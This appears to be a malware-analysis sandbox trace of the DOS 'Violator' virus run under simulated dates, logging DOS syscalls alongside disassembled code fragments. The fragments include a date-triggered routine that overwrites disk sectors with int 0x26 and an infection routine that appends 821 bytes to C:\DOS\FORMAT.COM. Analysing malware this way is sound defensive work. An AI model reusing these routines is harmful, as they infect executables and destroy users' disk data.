2018-12-25T11:58:59.958553961Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.960896186Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.965327912Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.96802094Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.97036992Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.977207977Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.979901594Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.9822495Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.985480886Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.988182748Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.990552607Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.993821072Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.99709398Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.999445911Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.001680194Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.006182074Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.009893744Z 61 PC: 12a69 | Open file (Filename = 'A:\TEST.EXE')
2018-12-25T11:59:00.027032145Z 63 PC: 12a69 | Read file or device (See above)
2018-12-25T11:59:00.034847111Z 62 PC: 12a69 | Close file (See above)
2018-12-25T11:59:00.036964293Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.039326854Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.042890025Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.045360522Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.047652785Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.051174737Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.053404698Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.055350656Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.05796928Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.060213797Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.063468978Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.066754552Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.069104189Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.071458265Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.074948228Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.076989452Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.079005765Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.08263876Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.085068414Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.087431396Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.090241185Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.092588929Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.095151033Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.0976714Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.100033039Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.103138605Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.10658073Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.108916032Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.112514261Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.114741757Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.117112929Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.120105215Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.122374421Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.126217899Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.130449446Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.132566003Z 9 PC: 12b93 | Display string (String= 'This file has not had the INJECT.EXE run on it to load the Virus name into it ')
2018-12-25T11:59:00.143394124Z 76 PC: 12a69 | Terminate with return code (See above)

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6255,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:58.94538671Z 255 PC: 13036 | UNKNOWN!
2018-12-25T11:58:58.946353722Z 42 PC: 13042 | Get date 0x13042: cmp cx, 0x7c7
0x13046: jb 0x13061
0x13048: jge 0x1304d
0x1304a: jmp 0x130a7
0x1304c: nop
0x1304d: mov ah, 0x2a
0x1304f: int 0x21
0x13051: cmp dh, 6
0x13054: jge 0x13059
0x13056: jmp 0x130a7
0x13058: nop
0x13059: cmp dl, 0x16
0x1305c: jge 0x1307f
0x1305e: jmp 0x130a7
0x13060: nop
0x13061: cmp cx, 0x7c6
0x13065: je 0x13074
0x13067: mov ah, 0x2b
0x13069: mov cx, 0x7c6
0x1306c: int 0x21
2018-12-25T11:58:58.948276479Z 43 PC: 1306e | Set date
2018-12-25T11:58:58.951195802Z 45 PC: 13074 | Set time
2018-12-25T11:58:58.954484392Z 44 PC: 13078 | Get time 0x13078: cmp cl, 0xf
0x1307b: jae 0x13089
0x1307d: jmp 0x1304d
0x1307f: mov ah, 9
0x13081: mov dx, si
0x13083: add dx, 0x40
0x13087: int 0x21
0x13089: cmp byte ptr [si], 0x1a
0x1308e: ja 0x130a7
0x13090: pushf
0x13091: mov al, byte ptr [si]
0x13095: mov cx, 0x100
0x13098: mov dx, 0
0x1309b: mov bx, 1
0x1309e: int 0x26
0x130a0: popf
0x130a1: inc byte ptr [si]
0x130a5: jmp 0x13089
0x130a7: push es
0x130a8: mov ah, 0x2f
2018-12-25T11:58:58.956367466Z 42 PC: 13051 | Get date 0x13051: cmp dh, 6
0x13054: jge 0x13059
0x13056: jmp 0x130a7
0x13058: nop
0x13059: cmp dl, 0x16
0x1305c: jge 0x1307f
0x1305e: jmp 0x130a7
0x13060: nop
0x13061: cmp cx, 0x7c6
0x13065: je 0x13074
0x13067: mov ah, 0x2b
0x13069: mov cx, 0x7c6
0x1306c: int 0x21
0x1306e: mov ah, 0x2d
0x13070: mov cl, 1
0x13072: int 0x21
0x13074: mov ah, 0x2c
0x13076: int 0x21
0x13078: cmp cl, 0xf
0x1307b: jae 0x13089
2018-12-25T11:58:58.958254165Z 47 PC: 130ac | Get disk transfer address
2018-12-25T11:58:58.95945665Z 26 PC: 130bf | Set disk transfer address
2018-12-25T11:58:58.9604438Z 78 PC: 1314a | Find first file
2018-12-25T11:58:58.970583718Z 79 PC: 13150 | Find next file
2018-12-25T11:58:58.97321455Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.975481592Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.977706485Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.98029065Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.982568942Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.984705024Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:59.002634075Z 78 PC: 1314a | Find first file (See above)
2018-12-25T11:58:59.015890994Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:59.01919764Z 67 PC: 13189 | Get or set file attributes
2018-12-25T11:58:59.026020951Z 67 PC: 1319b | Get or set file attributes
2018-12-25T11:58:59.535312472Z 61 PC: 131a6 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:58:59.542502473Z 87 PC: 131b2 | Get or set file date and time
2018-12-25T11:58:59.545680678Z 44 PC: 131be | Get time 0x131be: mov ah, 0x3f
0x131c0: mov cx, 3
0x131c3: mov dx, 0x68
0x131c6: nop
0x131c7: add dx, si
0x131c9: int 0x21
0x131cb: jb 0x13223
0x131cd: cmp ax, 3
0x131d0: jne 0x13223
0x131d2: mov ax, 0x4202
0x131d5: mov cx, 0
0x131d8: mov dx, 0
0x131db: int 0x21
0x131dd: jb 0x13223
0x131df: mov cx, ax
0x131e1: sub ax, 3
0x131e4: mov word ptr [si + 0x6c], ax
0x131e8: add cx, 0x34d
0x131ec: mov di, si
0x131ee: sub di, 0x24b
2018-12-25T11:58:59.548199195Z 63 PC: 131cb | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:58:59.553975064Z 66 PC: 131dd | Move file pointer
2018-12-25T11:58:59.556725352Z 64 PC: 13202 | Write file or device (Write 821 bytes on handle 5)
2018-12-25T11:58:59.564964121Z 66 PC: 13214 | Move file pointer
2018-12-25T11:58:59.56666735Z 64 PC: 13223 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:58:59.569802221Z 87 PC: 13236 | Get or set file date and time
2018-12-25T11:58:59.572103344Z 62 PC: 1323a | Close file
2018-12-25T11:58:59.590770218Z 67 PC: 13249 | Get or set file attributes
2018-12-25T11:58:59.601456133Z 26 PC: 13256 | Set disk transfer address
2018-12-25T11:58:59.604111126Z 2 PC: 12bae | Character output (Char = '0d')
2018-12-25T11:58:59.6064071Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.610299475Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.613562003Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.616100246Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.618480588Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.621555603Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.623857655Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.62602766Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.629241213Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.631457226Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.633650679Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.6366231Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.639330098Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.641552263Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.643782377Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.646362216Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.648633615Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.651915272Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.655102203Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.657443558Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.659796259Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.664464413Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.666825715Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.669204344Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.672464497Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.675912141Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.690834765Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.694589208Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.697153923Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.699565837Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.702743179Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.705218416Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.707629603Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.71093296Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.713447061Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.715932268Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.718565894Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.721984234Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.724379358Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.727473675Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.732403267Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.734916144Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.737313027Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.740724801Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.743100496Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.746285692Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.750070575Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.752407903Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.754592296Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.757749519Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.760264365Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.762702186Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.765867635Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.768547377Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.77094798Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.77407626Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.776723032Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.779103318Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.782282661Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.784825948Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.787140783Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.789620117Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.792689836Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.79497657Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.797276493Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.800490232Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.802781385Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.805806199Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.809059197Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.811534825Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.81381574Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.817021819Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.819299493Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.821575558Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.824642525Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.827208842Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.829469216Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.832461931Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.836286667Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.838569635Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.841729596Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.843944596Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.846213466Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.849436581Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.85175946Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.854031342Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.857020361Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.859483789Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.861739069Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.864729485Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.867327208Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.870066726Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.872397743Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.875113122Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.877489022Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.884864335Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.887939146Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.891752897Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.894257025Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.897585346Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.904790548Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.907191983Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.910603581Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.912947194Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.915304005Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.918626397Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.920960603Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.923313252Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.926478436Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.933992102Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.935833857Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.938081296Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.940612714Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.94311046Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.946342486Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.949046338Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.951471059Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.954559648Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.957230167Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.959861896Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.962954421Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.965489517Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.969036641Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.971202966Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.973700142Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.976503867Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.978783841Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.981352615Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.983559378Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.985827404Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.988576173Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.990885749Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.993105203Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.996067079Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.998292283Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.001797181Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.004596632Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.006601805Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.008549771Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.011280417Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.013663723Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.015600304Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.018427979Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.020827227Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.02305633Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.026065583Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.028322511Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.030412745Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.035332791Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.039275118Z 61 PC: 12a69 | Open file (Filename = 'A:\TEST.EXE')
2018-12-25T11:59:00.051956589Z 63 PC: 12a69 | Read file or device (See above)
2018-12-25T11:59:00.059138045Z 62 PC: 12a69 | Close file (See above)
2018-12-25T11:59:00.061519487Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.063816561Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.066781114Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.0693682Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.07160708Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.07460275Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.077156204Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.086363062Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.090105146Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.095926736Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.098227315Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.101243485Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.103893761Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.106182911Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.109139286Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.111794595Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.113773243Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.116753244Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.119091323Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.12205755Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.1249514Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.127460925Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.129676526Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.132582032Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.13509135Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.137354178Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.140441507Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.142963616Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.145169538Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.148068715Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.150589555Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.15278272Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.155574226Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.15963151Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.163325315Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.166119941Z 9 PC: 12b93 | Display string (String= 'This file has not had the INJECT.EXE run on it to load the Virus name into it ')
2018-12-25T11:59:00.174229288Z 76 PC: 12a69 | Terminate with return code (See above)

{"DateBased":true,"Day":22,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6255,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:59.033832129Z 255 PC: 13036 | UNKNOWN!
2018-12-25T11:58:59.035064535Z 42 PC: 13042 | Get date 0x13042: cmp cx, 0x7c7
0x13046: jb 0x13061
0x13048: jge 0x1304d
0x1304a: jmp 0x130a7
0x1304c: nop
0x1304d: mov ah, 0x2a
0x1304f: int 0x21
0x13051: cmp dh, 6
0x13054: jge 0x13059
0x13056: jmp 0x130a7
0x13058: nop
0x13059: cmp dl, 0x16
0x1305c: jge 0x1307f
0x1305e: jmp 0x130a7
0x13060: nop
0x13061: cmp cx, 0x7c6
0x13065: je 0x13074
0x13067: mov ah, 0x2b
0x13069: mov cx, 0x7c6
0x1306c: int 0x21
2018-12-25T11:58:59.038642761Z 43 PC: 1306e | Set date
2018-12-25T11:58:59.042968102Z 45 PC: 13074 | Set time
2018-12-25T11:58:59.047211138Z 44 PC: 13078 | Get time 0x13078: cmp cl, 0xf
0x1307b: jae 0x13089
0x1307d: jmp 0x1304d
0x1307f: mov ah, 9
0x13081: mov dx, si
0x13083: add dx, 0x40
0x13087: int 0x21
0x13089: cmp byte ptr [si], 0x1a
0x1308e: ja 0x130a7
0x13090: pushf
0x13091: mov al, byte ptr [si]
0x13095: mov cx, 0x100
0x13098: mov dx, 0
0x1309b: mov bx, 1
0x1309e: int 0x26
0x130a0: popf
0x130a1: inc byte ptr [si]
0x130a5: jmp 0x13089
0x130a7: push es
0x130a8: mov ah, 0x2f
2018-12-25T11:58:59.058587481Z 42 PC: 13051 | Get date 0x13051: cmp dh, 6
0x13054: jge 0x13059
0x13056: jmp 0x130a7
0x13058: nop
0x13059: cmp dl, 0x16
0x1305c: jge 0x1307f
0x1305e: jmp 0x130a7
0x13060: nop
0x13061: cmp cx, 0x7c6
0x13065: je 0x13074
0x13067: mov ah, 0x2b
0x13069: mov cx, 0x7c6
0x1306c: int 0x21
0x1306e: mov ah, 0x2d
0x13070: mov cl, 1
0x13072: int 0x21
0x13074: mov ah, 0x2c
0x13076: int 0x21
0x13078: cmp cl, 0xf
0x1307b: jae 0x13089
2018-12-25T11:58:59.061816561Z 9 PC: 13089 | Display string (String= ' Violator strikes again... ')
2018-12-25T11:58:59.070619696Z 47 PC: 130ac | Get disk transfer address
2018-12-25T11:58:59.073590926Z 26 PC: 130bf | Set disk transfer address
2018-12-25T11:58:59.075259111Z 78 PC: 1314a | Find first file
2018-12-25T11:58:59.089308737Z 79 PC: 13150 | Find next file
2018-12-25T11:58:59.092805563Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:59.111980159Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:59.115776466Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:59.120322384Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:59.124471398Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:59.127970502Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:59.132311204Z 78 PC: 1314a | Find first file (See above)
2018-12-25T11:58:59.144140143Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:59.148103178Z 67 PC: 13189 | Get or set file attributes
2018-12-25T11:58:59.15547213Z 67 PC: 1319b | Get or set file attributes
2018-12-25T11:58:59.531205109Z 61 PC: 131a6 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:58:59.535934652Z 87 PC: 131b2 | Get or set file date and time
2018-12-25T11:58:59.537834305Z 44 PC: 131be | Get time 0x131be: mov ah, 0x3f
0x131c0: mov cx, 3
0x131c3: mov dx, 0x68
0x131c6: nop
0x131c7: add dx, si
0x131c9: int 0x21
0x131cb: jb 0x13223
0x131cd: cmp ax, 3
0x131d0: jne 0x13223
0x131d2: mov ax, 0x4202
0x131d5: mov cx, 0
0x131d8: mov dx, 0
0x131db: int 0x21
0x131dd: jb 0x13223
0x131df: mov cx, ax
0x131e1: sub ax, 3
0x131e4: mov word ptr [si + 0x6c], ax
0x131e8: add cx, 0x34d
0x131ec: mov di, si
0x131ee: sub di, 0x24b
2018-12-25T11:58:59.540932063Z 63 PC: 131cb | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:58:59.551894935Z 66 PC: 131dd | Move file pointer
2018-12-25T11:58:59.553920155Z 64 PC: 13202 | Write file or device (Write 821 bytes on handle 5)
2018-12-25T11:58:59.564739011Z 66 PC: 13214 | Move file pointer
2018-12-25T11:58:59.566902858Z 64 PC: 13223 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:58:59.570420527Z 87 PC: 13236 | Get or set file date and time
2018-12-25T11:58:59.572971625Z 62 PC: 1323a | Close file
2018-12-25T11:58:59.580523471Z 67 PC: 13249 | Get or set file attributes
2018-12-25T11:58:59.591830727Z 26 PC: 13256 | Set disk transfer address
2018-12-25T11:58:59.594700919Z 2 PC: 12bae | Character output (Char = '0d')
2018-12-25T11:58:59.601106906Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.605768548Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.610207788Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.613663812Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.616457974Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.620120522Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.624090075Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.626873506Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.629741201Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.633487631Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.636706523Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.639522371Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.643522982Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.646312066Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.648809891Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.651694559Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.654297913Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.656516723Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.658857259Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.661531956Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.663907345Z 2 PC: 12bae | Character output (See above)
